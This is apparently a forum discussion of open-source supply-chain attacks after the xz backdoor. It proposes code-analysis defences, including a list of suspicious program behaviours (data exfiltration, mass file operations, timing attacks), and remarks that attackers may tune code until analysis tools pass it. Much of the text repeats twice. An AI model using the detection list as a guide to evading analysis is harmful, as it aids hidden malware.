The more-important and more-widely-used open source software is, the more appealing supply-chain attacks against it are.
The world where it doesn’t happen is one where open source doesn’t become successful.
I expect that we’ll find ways to mitigate stuff like this. Run a lot more software in isolation, have automated checking stuff, make more use of developer reputation, have automated code analysis, have better ways to monitor system changes, have some kind of “trust metric” on packages.
Go back to the 1990s, and most everything I sent online was unencrypted. In 2024, most traffic I send is encrypted. I imagine that changes can be made here too.
Yeah, I think there is a lot of potential for code analysis. There’s a limited cross section of ways malware can do interesting things, but many permutations of ways to do that.
So look for the interesting things, like:
accessing other programs’ address spaces
reading/writing files
deleting/moving files
sending/receiving network traffic
os system calls and console commands
interacting with hardware
spawning new processes
displaying things on the screen
accessing timing information
Obviously there’s legitimate uses for each of these, so that’s just the first step.
Next, analyze the data that is being used for that:
what’s the source?
what’s the destination?
what kind of transformations are being applied to the data?
Then you can watch out for things like:
is it systematically going through directories and doing some operation to all files? (Maybe ransomware, data scrubbing, or just maliciously deleting stuff?)
is it grabbing data from somewhere and sending it somewhere else on the internet? (Stealing data?)
is it using timing information to build data? (Timing attacks to figure out kernel data that should be hidden?)
is it changing OS settings/setup?
Then generate a report of everything it is doing and see if it aligns with what the code is supposed to do. Or you could even build some kind of permissions system around that with more sophistication than the basic “can this app access files? How about the internet?”
Computer programs can be complex, but are ultimately made up of a series of simple operations and it’s possible to build an interpreter that can do those operations and then follow everything through to see exactly what is included in the massive amount of data it sends over the network so that you can tell your file sharing program is also for some reason sending /etc/passwords to a random address or listening for something to access a sequence of closed ports and then will do x, y, z, if that ever happens. Back doors could be obvious with the right analysis tools, especially if it’s being built from source code (though I believe it’s still possible with binaries, just maybe a bit harder).
The Jia Tan xz backdoor attack did get flagged by some automated analysis tools – they had to get the analysis tools modified so that it would pass – and that was a pretty sophisticated attack. The people running the testing didn’t catch it, trusted the Jia Tan group that it was a false positive that needed to be fixed, but it was still putting up warning lights.
More sophisticated attackers will probably replicate their own code analysis environments mirroring those they know of online, make a checklist of running what code analysis tools they can run against locally prior to making the code visible, tweak it until it passes – but I think that it definitely raises the bar.
Could have some analysis tools that aren’t made public but run against important public code repositories specifically to try to make this more difficult.
Why can’t we have nice things instead.
I mean, this kind of stuff was going to happen.
The more-important and more-widely-used open source software is, the more appealing supply-chain attacks against it are.
The world where it doesn’t happen is one where open source doesn’t become successful.
I expect that we’ll find ways to mitigate stuff like this. Run a lot more software in isolation, have automated checking stuff, make more use of developer reputation, have automated code analysis, have better ways to monitor system changes, have some kind of “trust metric” on packages.
Go back to the 1990s, and most everything I sent online was unencrypted. In 2024, most traffic I send is encrypted. I imagine that changes can be made here too.
Yeah, I think there is a lot of potential for code analysis. There’s a limited cross section of ways malware can do interesting things, but many permutations of ways to do that.
So look for the interesting things, like:
Obviously there’s legitimate uses for each of these, so that’s just the first step.
Next, analyze the data that is being used for that:
Then you can watch out for things like:
Then generate a report of everything it is doing and see if it aligns with what the code is supposed to do. Or you could even build some kind of permissions system around that with more sophistication than the basic “can this app access files? How about the internet?”
Computer programs can be complex, but are ultimately made up of a series of simple operations and it’s possible to build an interpreter that can do those operations and then follow everything through to see exactly what is included in the massive amount of data it sends over the network so that you can tell your file sharing program is also for some reason sending /etc/passwords to a random address or listening for something to access a sequence of closed ports and then will do x, y, z, if that ever happens. Back doors could be obvious with the right analysis tools, especially if it’s being built from source code (though I believe it’s still possible with binaries, just maybe a bit harder).
The Jia Tan xz backdoor attack did get flagged by some automated analysis tools – they had to get the analysis tools modified so that it would pass – and that was a pretty sophisticated attack. The people running the testing didn’t catch it, trusted the Jia Tan group that it was a false positive that needed to be fixed, but it was still putting up warning lights.
More sophisticated attackers will probably replicate their own code analysis environments mirroring those they know of online, make a checklist of running what code analysis tools they can run against locally prior to making the code visible, tweak it until it passes – but I think that it definitely raises the bar.
Could have some analysis tools that aren’t made public but run against important public code repositories specifically to try to make this more difficult.
I believe you. There is no AI ever made that could have as bad a grammar as you. ;)
Because people have forgotten that bad actors exist.